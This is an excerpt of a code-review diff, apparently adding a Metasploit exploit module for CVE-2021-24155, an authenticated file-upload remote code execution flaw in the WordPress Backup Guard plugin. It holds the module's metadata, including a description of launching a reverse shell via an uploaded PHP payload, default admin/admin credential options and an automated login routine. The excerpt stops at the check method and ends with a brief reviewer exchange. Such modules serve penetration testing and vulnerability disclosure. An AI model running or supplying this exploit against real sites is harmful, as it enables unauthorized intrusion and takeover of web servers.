modules/exploits/multi/http/wordpress_plugin_backup_guard_rce.rb

```diff
@@ -0,0 +1,181 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+
+  include Msf::Exploit::Remote::HttpClient
+  prepend Msf::Exploit::Remote::AutoCheck
+  include Msf::Exploit::CmdStager
+
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name' => 'Wordpress Plugin Backup Guard - Authenticated Remote Code Execution',
+        'Description' => %q{
+          This module allows an attacker with a privileged Wordpress account to launch a reverse shell
+          due to an arbitrary file upload vulnerability in Wordpress plugin Backup Guard < 1.6.0.
+          This is due to an incorrect check of the uploaded file extension which should be of SGBP type.
+          Then, the uploaded payload can be triggered by a call to `/wp-content/uploads/backup-guard/my_payload.php`
+        },
+        'License' => MSF_LICENSE,
+        'Author' =>
+          [
+            'RON JOST', # Exploit-db
+            'Yann Castel (yann.castel[at]orange.com)' # Metasploit module
+          ],
+        'References' =>
+          [
+            ['EDB', '50093'],
+            ['CVE', '2021-24155']
+          ],
+        'Platform' => [ 'php' ],
+        'Arch' => ARCH_PHP,
+        'Targets' =>
+        [
+          [ 'Wordpress Backup Guard < 1.6.0', {}]
+        ],
+        'Privileged' => true,
+        'DisclosureDate' => '2021-05-04',
+        'Notes' =>
+          {
+            'Stability' => [ CRASH_SAFE ],
+            'SideEffects' => [ ARTIFACTS_ON_DISK, IOC_IN_LOGS ],
+            'Reliability' => [ REPEATABLE_SESSION ]
+          }
+      )
+    )
+
+    register_options [
+      OptString.new('USERNAME', [true, 'Username of the admin account', 'admin']),
+      OptString.new('PASSWORD', [true, 'Password of the admin account', 'admin']),
+      OptString.new('TARGETURI', [true, 'The base path of the Wordpress server', '/'])
+    ]
+  end
+
+  def authenticate
+    r = send_request_cgi({
+      'method' => 'GET',
+      'uri' => normalize_uri(target_uri.path, '/wp-login.php')
+    })
+
+    fail_with Failure::Unreachable "Target #{RHOST} could not be reached." unless r
+    cookie = r.get_cookies
+    r = send_request_cgi(
+      'method' => 'POST',
+      'uri' => normalize_uri(target_uri.path, '/wp-login.php'),
+      'headers' => {
+        'Origin' => full_uri('')
+      },
+      'cookie' => cookie,
+      'vars_post' => {
+        'log' => datastore['USERNAME'],
+        'pwd' => datastore['PASSWORD'],
+        'wp-submit': 'Log In',
+        testcookie: '1'
+      }
+    )
+
+    fail_with Failure::Unreachable "Target #{RHOST} could not be reached." unless r
+
+    if r.code == 302
+      return r.get_cookies
+    end
+
+    nil
+  end
+
+  def check
+    r = send_request_cgi({
```

Comment:
I would include this check: https://github.com/rapid7/metasploit-framework/pull/14578/files#diff-2b1f158335a2322c56e4f747884ec66c7421bb9e25508d270338f6e298749df3R52-R55

Reply:
Added